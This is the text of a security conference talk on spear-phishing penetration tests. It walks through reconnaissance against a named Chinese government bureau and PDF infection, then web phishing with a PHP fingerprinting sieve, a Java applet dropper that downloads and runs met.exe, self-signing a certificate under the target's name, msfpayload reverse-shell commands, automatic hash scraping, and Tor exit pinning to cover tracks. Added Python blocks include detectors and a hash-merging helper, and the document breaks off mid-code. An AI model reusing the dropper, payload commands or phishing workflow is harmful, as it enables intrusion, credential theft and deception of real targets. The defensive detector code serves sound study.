Valsmith

- Affiliations: 

• Attack Research 

• Metasploit 

- Work: 

• Attack Techniques Research 

• Pen Tester / Exploit Developer

• Reverse Engineer 

• Malware Analyst 




Previous Talks 

- Exploiting malware & vm detection 

- Kernel mode de-obfuscation of malware 

- Data mining malware collections 

- Tactical Exploitation 

- Post Exploitation 

- Analysis of foreign web attacks 
Overview



• Spear Phishing for Pen-Testing 

• Working on a framework on top of Metasploit

• Phile Phishing 

• Web Phishing 

• MSF automation 

• Abusing TOR 

• Tying it all together 
Spear-Phishing



This is the way people are getting in NOW
Remote exploits are much less prevalent
Blended attacks combining:

- Web

- File formats

- Malware

- Social Engineering
Spear-Phishing

How often do you pen test this way? 
Do clients let you? 
Spear-Phishing

You're missing a major vector! 
Spear-Phishing

Attackers now use targeted client side methods 

Web kits prevalent 

- Mpack, Tornado, LuckySploit, Zunker

- Who knows what's in these ? 

- Uncontrolled environment 

File format exploits abound 

- Sometimes get built into MSF, Core

- Same problems as web kits 

- Little public knowledge of file format (FF) RE methods

Solution? RE what the attackers do and make their techniques reliable
Work Flow



Thoroughly recon the target

Build a "legend" for your attack

- Find plausible documents from the target

Build your vector

- Infect PDFs

- Build a malicious website

Cast your line - send the target the lure
Work Flow

Set up a server-side exploitation system that can handle many clients at once

Receive the incoming access 

- Design to bypass their firewalls

- Look for proxies, HIDS/HFW, egress ports

• Inject into pre-authorized browsers

Automate your post-exploitation actions

- Scripts to grab passwords, install backdoors, enumerate info, grab tokens, log manipulation

Complex, needs a framework 
Why a Framework?



Client side is the new paradigm, as are frameworks
Phishing = client side attack surface facilitator 
Most client side tools are manual / standalone 
Core Impact is $$$ 
Pentesters need 

- Standardizable 

- Controllable 

- Automatable 

- Customized methods 

Targeting not as well defined or supported 
Targeting?
Targeting



• Greatly increases chances of success

• Heavily social

• Requires reco…

• The more kno… better

• Tactical Explo…

• Use target's p…
Targeting



Generic File Hunting / File Harvesting
Creative googling for documents
Read documents for juicy details
Read deeper
- Harvest metadata for juicy details
Targeting



Understand your target's infrastructure

- Tactical Exploitation topics apply

- Enumerate the target's "home" or actual networks

• Beyond just the hosting company

- Look for leaked proxy log analysis results

• These give you:

- Client applications

- Update frequencies

- Anti-Virus

- Anything that communicates out

- Internal IP addresses
[Screenshots: publicly indexed Squid proxy reports found with web searches]

- MySQL Squid Access Report 2.1.4: "Hosts and Users Summary for a Specific Day", Friday, 17 August 2007, with columns HOST IP, USERNAME, TIME, BYTES, requested URL and cache STATUS (TCP_MISS/200, TCP_IMS_HIT/304, ...)

- Squid Analysis Report Generator (SARG): "Squid User Access Reports", period 2009May22-2009May22, sorted by BYTES; Topuser table listing per-user CONNECT, BYTES, %BYTES, IN-CACHE-OUT, ELAPSED TIME, MILISEC and %TIME, with TOTAL and AVERAGE rows (generated by sarg-2.2.5)

- SARG Topsites Report, period 2007May10-2007May10, listing internal client addresses per user with connects, bytes and cache ratios (generated by sarg-2.1)

- SARG Squid User Access Report, accessed-sites table (ACCESSED SITE, CONNECT, BYTES, %BYTES, IN-CACHE-OUT, TIME) including internal client address:port entries

- SARG per-user report for 2009Apr02-2009Apr04 showing USERID, IP/NAME, DATE/TIME and the requested URL for each request: Windows Update .cab downloads, ESET nodupd update fetches, Microsoft ActiveX/codecs fetches and favicon requests
PHILE PHISHING
Looking ahead
Target File Selection and Infection

Search the web for your target and available files

- Newsletters are great

- Conference announcements

- Find recent things to modify

- Take advantage of relationships

• If your target partners with someone else, steal and infect their documents and send to the client

Goal is to get them to click

Script to automate target PDF acquisition
Target File Selection and Infection



How do you select a file for infection?

- People believe PDFs are a safe format

- People trust PDFs that are from their own organization

- Pick topics the target is likely interested in

- Pick files that are widely circulated

• Large audience

- Newsletters

- Company forms & instructions

- "Snow day" & activity announcements
[Screenshot: Google results for site:.gov.cn filetype:pdf, "Results 1 - 10 of about 338,000", listing government PDF documents; the browser is signed in to the presenter's personal Gmail account (mvalsmith@gmail.com) while the search is made]

Find file targets to infect

What's wrong with this picture? What shouldn't we have done?
[Screenshot: the first page of the Spatial Data Infrastructure - Asia and the Pacific (SDI-AP) newsletter, a free electronic newsletter for those interested in GIS, remote sensing and data management issues in Asia and the Pacific, sponsored and prepared by the Global Spatial Data Infrastructure (GSDI) Secretariat with input from PCGIAP; the page carries contribution instructions, acknowledgements of named contributors and a GIS KOREA 2005 conference note]

Let's say our target is a technical organization in the Chinese government

Here is a good candidate PDF they provide freely for us

http://www.sbsm.gov.cn/pcgiap/tech_paprs/SDIAPv2n4.pdf
[Screenshot: the last page of the same SDI-AP newsletter: calendar entries (a September geotechnical conference with abstracts due 31 March 2005; the CODATA conference in Beijing, 9-13 October), the online subscription link, the editor's name and title, "Global Spatial Data Infrastructure Association, http://www.gsdi.org, Copyright 2005", followed by the Google result snippet for the newsletter, which shows the editor's e-mail address]

Who publishes this newsletter?

Target for your attack legend

Spoof e-mail from this person?
[Screenshot: Google results for "@sbsm.gov.cn", "Results 1 - 10 of about 110,000", surfacing e-mail addresses and pages of the State Bureau of Surveying and Mapping (SBSM), the PCGIAP publication list and the National Geomatics Center of China]

Target e-mail addresses to send infected files to/from
[Screenshot: further Google results for related material on affiliated sites: CEOS newsletters and meeting minutes, GIS and remote sensing reports on disaster risk assessment, regional statistics presentations and an ecological footprint report, hosted on other .gov.cn domains]

Gather sites that have plausible relationships to send the infected files to
File Infection



Why PDFs?

- JavaScript

- Code execution

- Nested PDFs

- Exploits / vulns in readers

- Dynamic content

How do we infect them?

- Incremental update

- Tedious to do by hand

- Colin RE'd the PDF file format
File Infection



Adobe_basic_social_engineering.rb, Ruby script for infection

- Metasploit module

- Select a PDF to infect

- Pass the file to the module

- Output an infected PDF

- Other tools only generate a blank PDF
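A defender's triage check for the infection method on the two File Infection slides: an incremental update appended to an existing PDF that introduces JavaScript, an OpenAction or an embedded file. This is an added Python example, not the Adobe_basic_social_engineering.rb module or the PDF Defiler tool; the two byte layouts it runs on are constructed for the example and are not openable documents.

```python
"""Triage heuristic for PDFs modified by an appended incremental update.

Added example; not part of the original slides or the PDF Defiler tool.
An incremental update appends a new body, xref and trailer to an existing
document, so a modified file carries more than one startxref/%%EOF pair,
and any /OpenAction, /JavaScript or /EmbeddedFile introduced by the update
lives in that appended section.
"""
import re
from dataclasses import dataclass, field

# Names that make a document "active": the slides list JavaScript, nested
# PDFs (embedded files) and reader exploits as the reasons PDFs are used.
ACTIVE_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
                b"/Launch", b"/EmbeddedFile", b"/RichMedia")


@dataclass
class PdfTriage:
    eof_count: int
    startxref_count: int
    incremental_updates: int
    names_in_original: dict = field(default_factory=dict)
    names_in_updates: dict = field(default_factory=dict)

    @property
    def suspicious(self) -> bool:
        # Several %%EOF markers alone are normal (form saves, signatures);
        # an update that *introduces* active content is what an appended
        # infection looks like.
        return self.incremental_updates > 0 and bool(self.names_in_updates)


def count_active_names(blob: bytes) -> dict:
    """Count each active name in one raw section of the file.

    Caveat: names inside Flate-compressed object streams, or written with
    #xx escapes (e.g. /J#53), are invisible to this raw scan; decompress
    and normalise first if you need to cover those.
    """
    found = {}
    for name in ACTIVE_NAMES:
        # (?![A-Za-z0-9]) so that /JS does not match inside a longer name
        hits = re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", blob)
        if hits:
            found[name.decode()] = len(hits)
    return found


def triage_pdf(data: bytes) -> PdfTriage:
    """Split the file at each %%EOF: part 0 is the original revision,
    every later non-empty part is one incremental update."""
    parts = re.split(rb"%%EOF\r?\n?", data)
    updates = [p for p in parts[1:] if p.strip()]
    in_updates: dict = {}
    for upd in updates:
        for name, n in count_active_names(upd).items():
            in_updates[name] = in_updates.get(name, 0) + n
    return PdfTriage(
        eof_count=len(re.findall(rb"%%EOF", data)),
        startxref_count=len(re.findall(rb"startxref", data)),
        incremental_updates=len(updates),
        names_in_original=count_active_names(parts[0]),
        names_in_updates=in_updates,
    )


# Constructed byte layouts (xref offsets are dummies, so these are not
# openable PDFs, only the structure the triage inspects).
CLEAN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"xref\n0 4\n0000000000 65535 f \n"
    b"trailer << /Size 4 /Root 1 0 R >>\nstartxref\n0\n%%EOF\n"
)
# Appended update: a replacement catalog whose OpenAction runs a script.
UPDATED_PDF = CLEAN_PDF + (
    b"4 0 obj << /S /JavaScript /JS (app.alert('hello')) >> endobj\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"xref\n0 1\n0000000000 65535 f \n"
    b"trailer << /Size 5 /Root 1 0 R /Prev 0 >>\nstartxref\n0\n%%EOF\n"
)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_PDF), ("updated", UPDATED_PDF)):
        t = triage_pdf(blob)
        print(label, "updates:", t.incremental_updates,
              "added names:", t.names_in_updates, "suspicious:", t.suspicious)
```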
PDF Defiler



• Demo PDF Parser 

• Demo PDF Infector 
Web Phishing




These are the detailed mechanics of how to do this type of work 
Web Phishing

Direct targets to your website 

Enumerate the target using web app 

Socially engineer the target into believing everything is "ok"

Execute code on the target via SE, applet, exploit, etc.

Handle incoming access from target 

Automate post exploitation activities 

Use a reliable framework 
Web Phishing



Components 

- Target Sieve 

• OS detection 

• IP detection 

• Browser detection 

• Decision making 

- De-cloaking 

- Signed Java Applets 

• Fake certificate to target's org

- Social Engineering Attack 

- Obfuscation 
GENERAL FRAMEWORK
Web Phishing - Sieve



These are examples we are providing
Could be done many (better) ways

genHeader() - Generate header, noscript to test JS

ipCheck() - Get target IP and compare to scope

javaCheck() - Verify Java is enabled

osDetect() - Determine the operating system type

browserDetect() - Determine the browser in use

jsDecloakIP() - Get NATted / internal IP using JavaScript

japdip() - Get NATted / internal IP using a Java applet

logger() - Log captured info to a file
GENERATE AN HTTP PAGE HEADER
Web Phishing - Sieve

function genHeader() {
    global $bounceurl;   // redirect target for non-JS visitors, set by the calling script
    echo "<html>";
    echo "<body>";
    // A browser without JavaScript follows the meta refresh and leaves the page
    echo "<noscript>";
    echo "<meta http-equiv=\"refresh\" content=\"0;url=$bounceurl\">";
    echo "</noscript>";
} // end genHeader
VERIFY TARGET IP IS IN SCOPE
Web Phishing - Sieve

function ipCheck($target_ip) {
    global $firstRange, $sndRange;   // in-scope address patterns, set by the calling script
    $scopeIPflag = 0;
    if ((preg_match("/$firstRange/", $target_ip, $matches)) ||
        (preg_match("/$sndRange/", $target_ip, $matches))) {
        $scopeIPflag = 1;
    } // end if
    else {
        $scopeIPflag = 0;
    } // end else
    return $scopeIPflag;
} // end ipCheck
VERIFY JAVA INSTALL

Web Phishing - Sieve

function javaCheck() {
    echo "<script language=javascript>";
    echo 'if (navigator.javaEnabled()) { }';
    // No Java: say so and send the visitor elsewhere
    echo 'else { document.write("No JAVA"); window.location = "http://blog.attackresearch.com"; }';
    echo "</script>";
} // end javaCheck

OS DETECTION
Web Phishing - Sieve



function osDetect($useragent) {
    // Check for windows, and send to windows page
    if (preg_match("/Windows/", $useragent, $winmatched)) {
        $ostype = "win";
    } // end windows check
    // Check for linux, and send to linux page
    elseif (preg_match("/Linux/", $useragent, $linmatched)) {
        $ostype = "linux";
    } // end linux check
    // Check for mac, and send to mac page
    elseif (preg_match("/Macintosh/", $useragent, $macmatched)) {
        $ostype = "mac";
    } // end mac
    else {
        $ostype = "unknown";
    } // end else
    return $ostype;
} // end osDetect
GATHER BROWSER INFO
Web Phishing - Sieve



function browserDetect($useragent) {
    // Check for firefox
    if (preg_match("/Firefox/", $useragent, $winmatched)) {
        $browsertype = "ff";
    } // end ff check
    // Check for IE
    elseif (preg_match("/MSIE/", $useragent, $winmatched)) {
        $browsertype = "ie";
    } // end ie check
    // Check for safari
    elseif (preg_match("/Safari/", $useragent, $winmatched)) {
        $browsertype = "safari";
    } // end safari check
    // Check for opera
    elseif (preg_match("/Opera/", $useragent, $winmatched)) {
        $browsertype = "opera";
    } // end opera check
    // Browser unknown
    else {
        $browsertype = "unknown";
    } // end unknown check
    return $browsertype;
} // end browserDetect
INTERNAL ANATOMY OF A BONY FISH

[Slide image: labelled anatomical diagram of a bony fish]

GET TARGET'S INTERNAL IP VIA JS
Web Phishing - Sieve

function jsDecloakIP() {
    // LiveConnect: from JavaScript, open a java.net.Socket back to the page's own host
    // and read the local address the client used for it, i.e. its internal / NATted IP
    echo '<script type="text/javascript">';
    echo 'function natIP() {';
    echo '  var w = window.location;';
    echo '  var host = w.host;';
    echo '  var port = w.port || 80;';
    echo '  var Socket = (new java.net.Socket(host,port)).getLocalAddress().getHostAddress();';
    echo '  return Socket;';
    echo '}';
    echo '</script>';

    // Hand the result back to the sieve as the dip parameter
    echo '<script language=javascript>';
    echo 'realIP = natIP();';
    echo 'document.location.href="sieve.php?dip="+realIP;';
    echo '</script>';
} // end jsDecloakIP
GET INTERNAL IP VIA JAVA APPLET
Web Phishing - Sieve



function japdip() {
    // Embed the MyAddress applet; it reports the client's local address back to sieve.php
    echo '<APPLET code="MyAddress.class" archive="MyAddress.gif" WIDTH=500 HEIGHT=14>';
    echo '<PARAM NAME="URL" VALUE="sieve.php?japdip=">';
    echo '<PARAM NAME="ACTION" VALUE="AUTO">';
    echo '</APPLET>';
} // end japdip

Check out http://www.reglos.de/myaddress/MyAddress.html for info about the class file.
LOG ALL RELEVANT INFORMATION
Web Phishing - Sieve

function logger($target_ip, $dip, $ost, $bt, $sipf, $hitdate) {
    $nl = "\n";
    $delim = "|";
    // One pipe-delimited record: external IP | decloaked IP | OS | browser | in-scope flag | hit date
    $data = $target_ip . $delim . $dip . $delim . $ost . $delim . $bt . $delim . $sipf . $delim . $hitdate . $nl;
    $outFile = "clientlog.txt";
    $fh = fopen($outFile, 'a') or die("can't open logfile");
    fwrite($fh, $data);
    fclose($fh);
} // end logger



DEMO

[Screenshot: browser at http://192.168.0.34/metaphish/sieve.php?dip=... with a user-agent switcher, showing the sieve's output:]

INSCOPE: YES
TARGETIP: 192.168.0.16
DECIP: 192.168.0.16
JDECIP:
BROWSERTYPE: IT
OS: win
HITDATE: 20090402152229

Example page

Normally you wouldn't display output

Shows all the data acquired from the target
Web Phishing

Social Engineering

• Java applet for distributing and executing meterpreter

• Client hits page

• Java applet window pops up

• Client hits "Run"

• Applet causes the client to (in the background) download the meterpreter executable from your site

• Applet executes meterpreter

• Meterpreter sends a reverse shell to your server
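Seen from the defender's side, the chain above leaves a recognisable trace in the web proxy log. This added Python example, not part of the slides or the MetaPhish code, parses Squid native access.log lines and raises an alert when one client fetches a Java archive and then an executable from the same host within a short window, marking a later CONNECT back to that host as the likely callback; every hostname, address and log line in it is constructed sample data.

```python
"""Proxy-log detection for the applet dropper chain described above.

Added example; not part of the original slides or the MetaPhish code.
As described: the client loads the page, accepts the applet, the applet
downloads an executable from the same site and runs it, and the payload
calls back to the server. On a Squid-style proxy that leaves, for one
client and one host: a Java archive fetch, an executable download a few
seconds later, and usually a CONNECT back to that host.
All hostnames, addresses and log lines here are constructed sample data.
"""
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

APPLET_TYPES = {"application/java-archive", "application/x-java-applet"}
EXE_TYPES = {"application/x-msdownload", "application/x-dosexec",
             "application/x-msdos-program"}
APPLET_EXT = (".jar", ".class")
EXE_EXT = (".exe", ".scr", ".dll", ".msi")


@dataclass
class Request:
    ts: float
    client: str
    method: str
    url: str
    host: str
    ctype: str


@dataclass
class Alert:
    client: str
    host: str
    applet_url: str
    exe_url: str
    seconds_apart: float
    callback_seen: bool = False


def parse_squid_native(line: str) -> Optional[Request]:
    """Parse one Squid native access.log line:
    time elapsed client action/code size method URL ident hierarchy/peer type"""
    f = line.split()
    if len(f) < 10:
        return None
    try:
        ts = float(f[0])
    except ValueError:
        return None
    method, url = f[5], f[6]
    # CONNECT requests carry host:port rather than a full URL
    if method == "CONNECT":
        host = url.rsplit(":", 1)[0]
    else:
        host = urlparse(url).hostname or ""
    return Request(ts, f[2], method, url, host.lower(), f[9].lower())


def _path_ends(r: Request, exts) -> bool:
    return urlparse(r.url).path.lower().endswith(exts)


def is_applet(r: Request) -> bool:
    return r.method == "GET" and (r.ctype in APPLET_TYPES or _path_ends(r, APPLET_EXT))


def is_exe(r: Request) -> bool:
    return r.method == "GET" and (r.ctype in EXE_TYPES or _path_ends(r, EXE_EXT))


def detect_applet_droppers(lines, window: float = 120.0) -> List[Alert]:
    """One Alert per (client, host) where an executable download follows an
    applet fetch from the same host within `window` seconds; a later CONNECT
    from that client to that host sets callback_seen."""
    reqs = [r for r in map(parse_squid_native, lines) if r is not None]
    reqs.sort(key=lambda r: r.ts)
    last_applet = {}   # (client, host) -> most recent applet fetch
    alerts = {}        # (client, host) -> Alert
    for r in reqs:
        key = (r.client, r.host)
        if is_applet(r):
            last_applet[key] = r
        elif is_exe(r) and key in last_applet and key not in alerts:
            gap = r.ts - last_applet[key].ts
            if 0 <= gap <= window:
                alerts[key] = Alert(r.client, r.host, last_applet[key].url, r.url, round(gap, 3))
        elif r.method == "CONNECT" and key in alerts:
            alerts[key].callback_seen = True
    return list(alerts.values())


# Constructed sample log: one client walks the whole chain, another fetches
# an unrelated intranet applet and, much later, an installer from elsewhere.
SAMPLE_LOG = [
    "1238685749.123 312 10.20.2.55 TCP_MISS/200 2412 GET http://lure.example.test/sieve.php?dip=192.168.0.16 - DIRECT/203.0.113.10 text/html",
    "1238685751.501 187 10.20.2.55 TCP_MISS/200 6144 GET http://lure.example.test/MetaPhish.jar - DIRECT/203.0.113.10 application/java-archive",
    "1238685753.004 903 10.20.2.55 TCP_MISS/200 73802 GET http://lure.example.test/data/win/met.exe - DIRECT/203.0.113.10 application/octet-stream",
    "1238685760.220 4500 10.20.2.55 TCP_TUNNEL/200 1020 CONNECT lure.example.test:443 - DIRECT/203.0.113.10 -",
    "1238685800.000 50 10.20.2.90 TCP_HIT/200 1200 GET http://intranet.example.test/app/viewer.jar - NONE/- application/java-archive",
    "1238690000.000 120 10.20.2.90 TCP_MISS/200 40000 GET http://dl.example.test/setup.exe - DIRECT/198.51.100.5 application/octet-stream",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for a in detect_applet_droppers(SAMPLE_LOG):
        print(a)
```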
Web Phishing - Dropper/Exec



import java.applet.Applet;
import java.io.*;
import java.net.*;
import java.io.IOException;

public class WebDispApp extends Applet {
    public WebDispApp() { }

    public void init() {
        downloadURL();
        cmd();
    } /* end public void init */

    public void downloadURL() {
        OutputStream out = null;
        URLConnection conn = null;
        InputStream in = null;
        try {
            URL url = new URL("http://192.168.1.1/data/win/met.exe");
            out = new BufferedOutputStream(new FileOutputStream("c:\\met.exe"));
            conn = url.openConnection();
            in = conn.getInputStream();
            byte[] buffer = new byte[1024];
            int numRead;
            long numWritten = 0;
            while ((numRead = in.read(buffer)) != -1) {
                out.write(buffer, 0, numRead);
                numWritten += numRead;
            } /* end while */
        } /* end try */
        catch (Exception exception) {
            exception.printStackTrace();
        } /* end catch */
        finally {
            try {
                if (in != null) {
                    in.close();
                } /* end if */
                if (out != null) {
                    out.close();
                } /* end if */
            } /* end try */
            catch (IOException ioe) { }
        } /* end finally */
    } /* end public void downloadURL */

    public void cmd() {
        Process process;
        try {
            process = Runtime.getRuntime().exec("cmd.exe /c c:\\met.exe");
        } /* end try */
        catch (IOException ioexception) { }
    } /* end public void cmd */
} /* end public class */
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Web Phishing - Dropper/Exec 

• How to make it deadly?

• Use a signed Java applet

- Self-sign it as your target (the Publisher name the victim sees is whatever you put in the keystore's dname)

- User reads the cert and trusts it (usually); the dialog still says the signature "cannot be verified", but that is the same warning they have clicked through before

- So many sites have invalid certs users don't even notice anymore

• Change up filenames / code to reflect the target's application infrastructure

- If they use WordPress, use WordPress-sounding file names for example
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Web Phishing - Dropper/Exec 



Compile the applet (the source file name must match the public class name; the dropper shown earlier is named WebDispApp, the build below uses MetaPhish):

- javac MetaPhish.java

Package the class file into a jar:

- jar -cf MetaPhish.jar MetaPhish.class

Build a keystore and set the passwords / organization name (the cn is what the victim sees as Publisher):

- keytool -genkey -alias signFiles -keystore msfkeystore -storepass msfstorepass -dname "cn=The Targets Org" -keypass msfkeypass

Sign the jar and create a "secured" jar:

- jarsigner -keystore msfkeystore -storepass msfstorepass -keypass msfkeypass -signedjar sMetaPhish.jar MetaPhish.jar signFiles

Export the certificate:

- keytool -export -keystore msfkeystore -storepass msfstorepass -alias signFiles -file MetaPhishLLC.cer

Import the certificate:

- keytool -import -alias company -file MetaPhishLLC.cer -keystore msfkeystore -storepass msfstorepass
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Web Phishing - Dropper/Exec 

• You will now have a collection of files: 

- MetaPhish.class * Compiled Java 

- MetaPhish.jar * Compressed class 

- MetaPhish.java * Source code 

- MetaPhishLLC.cer * Certificate 

- msfkeystore * Key store 

- sMetaPhish.jar * Signed Jar 

- windex.html * malicious web page 
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Web Phishing - Dropper/Exec 

• Web code to execute the applet:

<html>
<body>
<APPLET code="MetaPhish.class" archive="sMetaPhish.jar" width="1" height="1"></APPLET>
</body>
</html>

• Put this in an IFRAME alongside a valid web site to trick the target
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Web Phishing - Dropper/Exec 



Screenshot: http://192.168.0.34/metaphish/win/windex.html

Java security dialog shown to the victim:

  The application's digital signature cannot be verified.
  Do you want to run the application?

  Name: MetaPhish
  Publisher: The Targets Org
  From: http://192.168.0.34
  [ ] Always trust content from this publisher.

  The digital signature cannot be verified by a trusted source. Only run if you trust the origin of the application.

• Victim receives message box

• Digital signature will appear to have the "trusted" information

• Many users will run this

• Basically social engineering / targeted phishing
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Automation 
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MSF Multi-Handler / Automation 

Need to be able to handle n incoming 
sessions 

Need to be able to automate functions 

- Acquire passwords 

- Add users 

- Upload 2nd stage persistence backdoor 

- Registry / stored info 

Need to use firewall allowed egress ports 
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MSF Multi-Handler / Automation 



Create a stand alone meterpreter binary for 
windows: 

- Use the reverse connection assuming there is a 
firewall 

- Set your IP, should be directly internet accessible 

- Set the port to receive incoming sessions, directly 
internet accessible 

- Set the output name of the executable, for covertness 
set something targeted 

• ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.34 LPORT=8000 R | ./msfencode -b '' -t exe -o meterpreter.exe
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MSF Multi-Handler / Automation 

Run metasploit: ./msfconsole

Set MSF parameters to match the meterpreter binary:

- msf > use exploit/multi/handler

- msf exploit(handler) > set ExitOnSession false

- msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

- msf exploit(handler) > set LHOST 192.168.0.34

- msf exploit(handler) > set LPORT 8000
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MSF Multi-Handler / Automation 

Setup automation script and set MSF in multihandling mode

- msf exploit(handler) > set AutoRunScript ./PhishScrape.rb

- msf exploit(handler) > exploit -j

-j runs the handler as a background job so the console stays usable while sessions arrive; with ExitOnSession false it keeps listening after the first one

You can use any script you want, we are providing an example
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MSF Multi-Handler / Automation 



• Deploy the meterpreter to your target using whatever means

- Infected PDF / files

• Exploit

- Malicious website

• Java applet

• Exploits

- Email it directly
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MSF Multi-Handler / Automation 



Watch for:

- [*] Transmitting intermediate stager for over-sized stage... (191 bytes)

You have successfully compromised a target!

- Many targets may come in at once

- To list your sessions do:

• sessions -l

• Then you can use standard meterpreter commands

MSF Multi-Handler / Automation

• An automated scraper will run on each target

• Will gather info automatically and place it in ~/.msf3/logs/scraper

• Each compromised target will generate a dir

- ipaddress_data_timestamp
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MSF Multi-Handler / Automation 



The following information will be autoscraped: 



env.txt # System environment 
group.txt # Domain group info 
hashes.txt # Crackable password hashes 
localgroup.txt # local group memberships 

nethood.txt # network neighborhood info 

network.txt # detail networking info of target 

services.txt # running services (look for AV) 

shares.txt # Any shared directories 
system.txt # operating system info 
users.txt # local user account names 



Take a look at DarkOperator's scripts for more ideas: 
http://www.darkoperator.com/ 
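With many sessions coming in at once the scraper output piles up as one directory per target, and the first two questions are always the same: which hosts have AV running, and what is the combined set of hashes to crack. The following is an added Python example, not part of the slides or of the scraper script; it assumes the directory layout described above (ipaddress_date_timestamp), that hashes.txt holds pwdump-style lines (user:rid:lmhash:nthash:::), that services.txt lists one running service name per line, and the AV_KEYWORDS watch list is hypothetical. The sample tree it builds is constructed.

```python
import os
import re
import tempfile

# Hypothetical watch list: substrings that mark a service as endpoint protection.
AV_KEYWORDS = ("symantec", "mcafee", "antivirus", "sophos", "kaspersky", "trend micro")

# pwdump line: user:rid:LM(32 hex):NT(32 hex):::  (assumed format of hashes.txt)
PWDUMP_RE = re.compile(r"^[^:]+:\d+:[0-9a-fA-F]{32}:[0-9a-fA-F]{32}:::$")


def _read_lines(path):
    """Non-empty stripped lines of a file, or [] if the scraper never wrote it."""
    if not os.path.isfile(path):
        return []
    with open(path, "r", errors="replace") as fh:
        return [ln.strip() for ln in fh if ln.strip()]


def triage_scraper_root(root):
    """Return {target_dir_name: {"ip": ..., "hashes": [...], "av": [...]}}."""
    results = {}
    for name in sorted(os.listdir(root)):
        target = os.path.join(root, name)
        if not os.path.isdir(target):
            continue
        ip = name.split("_", 1)[0]  # assumed ipaddress_date_timestamp naming
        hashes = [ln for ln in _read_lines(os.path.join(target, "hashes.txt"))
                  if PWDUMP_RE.match(ln)]
        av = [s for s in _read_lines(os.path.join(target, "services.txt"))
              if any(k in s.lower() for k in AV_KEYWORDS)]
        results[name] = {"ip": ip, "hashes": hashes, "av": av}
    return results


def merge_hashes(results):
    """Collapse every target's hashes into one deduplicated pwdump list.

    Dedup on the hash pair, not the username: the same local admin hash on
    many hosts is one crack job and one password-reuse finding.
    """
    seen, merged = set(), []
    for name in sorted(results):
        for line in results[name]["hashes"]:
            user, rid, lm, nt, *_ = line.split(":")
            key = (lm.lower(), nt.lower())
            if key in seen:
                continue
            seen.add(key)
            merged.append(line)
    return merged


def demo():
    """Build a constructed scraper tree in a temp dir and triage it."""
    root = tempfile.mkdtemp(prefix="scraper_")
    samples = {
        "192.168.0.16_20090402.152229": {
            "hashes.txt": "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
                          "jsmith:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::\n",
            "services.txt": "Symantec AntiVirus\nWorkstation\nServer\n",
        },
        "192.168.0.22_20090402.153301": {
            "hashes.txt": "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
                          "not a hash line\n",
            "services.txt": "Workstation\nPrint Spooler\n",
        },
    }
    for dname, files in samples.items():
        os.makedirs(os.path.join(root, dname))
        for fname, body in files.items():
            with open(os.path.join(root, dname, fname), "w") as fh:
                fh.write(body)
    results = triage_scraper_root(root)
    return results, merge_hashes(results)


if __name__ == "__main__":
    res, merged = demo()
    for name, info in res.items():
        print(name, "AV:", info["av"] or "none seen", "hashes:", len(info["hashes"]))
    print("unique hashes to crack:", len(merged))
```

Point triage_scraper_root at ~/.msf3/logs/scraper on the real box; the AV column tells you which hosts need a different second stage before you upload anything persistent.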
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Metaphish 



Demo 
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Who do you want to be today? 




Abusing Tor 
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Button, button, who's got the button 

• When using tor, normally the exit node is random 

• It is possible to define an exit node, or group of exit 
nodes 

• Nice for viewing content that is blocked by country 

• Way to cover tracks 

• Easy to hide in the evil that is tor 

• Avoid using an exit node in the target country when 
possible 

- Target country can collect node for forensics 
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Where am I again? 

• Theoretically you can just specify a country code in the torrc file.

• Never seen it work correctly

• Documented not to work in many news groups

• Nice to pop out of just one or two nodes if 
running scans and such 

• Easy to change, can even have many configs 
with different exit nodes, and periodically 
change 
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Who's who 

• Vidalia is an easy way to manage tor, here 
we are looking at potential tor exit nodes 
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Who's who 

• Selecting Nodes Through Vidalia 

• When selecting exit nodes, it is important to 
make sure they have somewhat unique names 

- Unnamed is a common node name, it should be 
avoided 

• Now create a new file that will be the tor config 

- Add the following lines 

ExitNodes list,of,nodes 
StrictExitNodes 1 
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Who's who 

• There are also webpages that will provide tor nodes 

• https://torstatus.blutmagie.de/ 

• Here it is possible to click on a node and retrieve a fingerprint

- Add a dollar sign to the front and get rid of the spaces. Then these can be used as tor exit nodes

• Unnamed: 46D0 5072 0DE9 D59E 6C22 D970 453B E287 C03F CE9B -> $46D050720DE9D59E6C22D970453BE287C03FCE9B

- All these nodes may not be active at any given time, so grab a lot

- Now Unnamed will work great: when you pin by fingerprint, names do not matter
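Pasting a dozen fingerprints by hand is where typos creep in, and a malformed entry silently shrinks your exit pool. The following is an added Python example (not part of the slides) that normalizes fingerprints copied from a status page into the form torrc expects and emits the ExitNodes / StrictExitNodes lines from the previous slide. Only the Unnamed fingerprint is from the slide; the other inputs are constructed.

```python
import re

HEX40 = re.compile(r"^[0-9A-F]{40}$")


def normalize_fingerprint(raw):
    """'46D0 5072 ... CE9B' -> '$46D05072...CE9B'; raise on anything that isn't 40 hex digits."""
    fp = raw.strip().lstrip("$").replace(" ", "").upper()
    if not HEX40.match(fp):
        raise ValueError("not a 40-hex-digit fingerprint: %r" % raw)
    return "$" + fp


def build_torrc(raw_fingerprints, strict=True):
    """Return (torrc_text, rejected) pinning exits to the given relays.

    Duplicates are dropped (the same relay pasted twice does not widen the
    pool) and inputs that fail validation are returned in 'rejected' instead
    of being silently skipped, so you notice a bad paste before Tor does.
    """
    seen, good, rejected = set(), [], []
    for raw in raw_fingerprints:
        try:
            fp = normalize_fingerprint(raw)
        except ValueError:
            rejected.append(raw)
            continue
        if fp not in seen:
            seen.add(fp)
            good.append(fp)
    if not good:
        raise ValueError("no usable exit fingerprints; with StrictExitNodes 1 Tor would build no circuits")
    lines = ["ExitNodes " + ",".join(good)]
    if strict:
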